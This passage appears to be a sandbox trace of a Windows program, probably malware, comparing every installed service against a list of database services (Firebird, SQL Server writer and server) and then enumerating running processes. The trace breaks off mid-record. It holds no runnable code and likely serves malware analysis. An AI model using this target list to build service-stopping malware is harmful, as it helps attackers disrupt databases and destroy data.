[0177.516] lstrlenW (lpString="CryptSvc") returned 8 [0177.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0177.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0177.516] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0177.516] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0177.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0177.516] lstrlenW (lpString="DcomLaunch") returned 10 [0177.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0177.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0177.516] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0177.516] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0177.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0177.516] lstrlenW (lpString="DeviceAssociationService") returned 24 [0177.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0177.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0177.517] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0177.517] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0177.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0177.517] lstrlenW (lpString="Dhcp") returned 4 [0177.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0177.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0177.517] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0177.517] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0177.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0177.517] lstrlenW (lpString="Dnscache") returned 8 [0177.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0177.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0177.517] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0177.517] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0177.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0177.517] lstrlenW (lpString="DPS") returned 3 [0177.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0177.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0177.517] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0177.517] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0177.517] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0177.517] lstrlenW (lpString="DusmSvc") returned 7 [0177.517] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0177.517] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0177.517] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0177.517] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0177.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0177.518] lstrlenW (lpString="EventLog") returned 8 [0177.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0177.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0177.518] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0177.518] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0177.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0177.518] lstrlenW (lpString="EventSystem") returned 11 [0177.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0177.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0177.518] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0177.518] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0177.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0177.518] lstrlenW (lpString="FontCache") returned 9 [0177.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0177.518] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0177.518] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0177.518] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0177.518] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0177.518] lstrlenW (lpString="gpsvc") returned 5 [0177.518] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0177.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0177.519] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0177.519] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0177.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0177.519] lstrlenW (lpString="iphlpsvc") returned 8 [0177.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0177.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0177.519] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0177.519] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0177.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0177.519] lstrlenW (lpString="KeyIso") returned 6 [0177.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0177.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0177.519] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0177.519] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0177.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0177.519] lstrlenW (lpString="LanmanServer") returned 12 [0177.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0177.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0177.519] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0177.519] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0177.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0177.519] lstrlenW (lpString="LanmanWorkstation") returned 17 [0177.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0177.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0177.519] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0177.519] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0177.519] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0177.519] lstrlenW (lpString="lfsvc") returned 5 [0177.519] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0177.519] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0177.519] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0177.519] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0177.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0177.520] lstrlenW (lpString="lmhosts") returned 7 [0177.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0177.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0177.520] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0177.520] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0177.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0177.520] lstrlenW (lpString="LSM") returned 3 [0177.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0177.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0177.520] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0177.520] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0177.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0177.520] lstrlenW (lpString="MpsSvc") returned 6 [0177.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0177.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0177.520] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0177.520] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0177.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0177.520] lstrlenW (lpString="NcbService") returned 10 [0177.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0177.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0177.520] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0177.520] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0177.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0177.520] lstrlenW (lpString="netprofm") returned 8 [0177.520] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0177.520] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0177.520] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0177.520] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0177.520] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0177.520] lstrlenW (lpString="NgcSvc") returned 6 [0177.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0177.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0177.521] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0177.521] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0177.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0177.521] lstrlenW (lpString="NlaSvc") returned 6 [0177.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0177.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0177.521] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0177.521] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0177.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0177.521] lstrlenW (lpString="nsi") returned 3 [0177.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0177.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0177.521] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0177.521] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0177.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0177.521] lstrlenW (lpString="PcaSvc") returned 6 [0177.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0177.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0177.521] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0177.521] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0177.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0177.521] lstrlenW (lpString="PlugPlay") returned 8 [0177.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0177.521] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0177.521] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0177.521] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0177.521] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0177.521] lstrlenW (lpString="Power") returned 5 [0177.521] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0177.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0177.522] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0177.522] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0177.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0177.522] lstrlenW (lpString="ProfSvc") returned 7 [0177.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0177.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0177.522] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0177.522] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0177.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0177.522] lstrlenW (lpString="RpcEptMapper") returned 12 [0177.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0177.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0177.522] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0177.522] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0177.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0177.522] lstrlenW (lpString="RpcSs") returned 5 [0177.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0177.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0177.522] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0177.522] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0177.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0177.522] lstrlenW (lpString="SamSs") returned 5 [0177.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0177.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0177.522] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0177.522] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0177.522] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0177.522] lstrlenW (lpString="Schedule") returned 8 [0177.522] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0177.522] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0177.522] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0177.523] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0177.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0177.523] lstrlenW (lpString="SecurityHealthService") returned 21 [0177.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0177.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0177.523] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0177.523] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0177.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0177.523] lstrlenW (lpString="SENS") returned 4 [0177.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0177.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0177.523] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0177.523] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0177.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0177.523] lstrlenW (lpString="ShellHWDetection") returned 16 [0177.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0177.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0177.523] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0177.523] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0177.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0177.523] lstrlenW (lpString="Spooler") returned 7 [0177.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0177.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0177.523] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0177.523] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0177.523] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0177.523] lstrlenW (lpString="StateRepository") returned 15 [0177.523] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0177.523] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0177.523] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0177.523] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0177.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0177.524] lstrlenW (lpString="SysMain") returned 7 [0177.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0177.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0177.524] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0177.524] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0177.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0177.524] lstrlenW (lpString="SystemEventsBroker") returned 18 [0177.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0177.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0177.524] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0177.524] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0177.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0177.524] lstrlenW (lpString="Themes") returned 6 [0177.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0177.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0177.524] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0177.524] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0177.524] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0177.524] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0177.524] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0177.524] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0177.524] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0177.524] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0177.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c77e0 | out: hHeap=0x680000) returned 1 [0177.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0177.532] Process32FirstW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.532] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0177.533] lstrlenW (lpString="System") returned 6 [0177.533] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0177.534] lstrlenW (lpString="smss.exe") returned 8 [0177.534] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.535] lstrlenW (lpString="csrss.exe") returned 9 [0177.535] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0177.535] lstrlenW (lpString="wininit.exe") returned 11 [0177.535] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.536] lstrlenW (lpString="csrss.exe") returned 9 [0177.536] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0177.537] lstrlenW (lpString="winlogon.exe") returned 12 [0177.537] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0177.537] lstrlenW (lpString="services.exe") returned 12 [0177.537] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0177.538] lstrlenW (lpString="lsass.exe") returned 9 [0177.538] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0177.539] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0177.539] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0177.539] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0177.540] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.540] lstrlenW (lpString="svchost.exe") returned 11 [0177.540] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.541] lstrlenW (lpString="svchost.exe") returned 11 [0177.541] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0177.542] lstrlenW (lpString="dwm.exe") returned 7 [0177.542] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.542] lstrlenW (lpString="svchost.exe") returned 11 [0177.542] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.543] lstrlenW (lpString="svchost.exe") returned 11 [0177.543] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.544] lstrlenW (lpString="svchost.exe") returned 11 [0177.544] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.544] lstrlenW (lpString="svchost.exe") returned 11 [0177.544] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.545] lstrlenW (lpString="svchost.exe") returned 11 [0177.545] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, 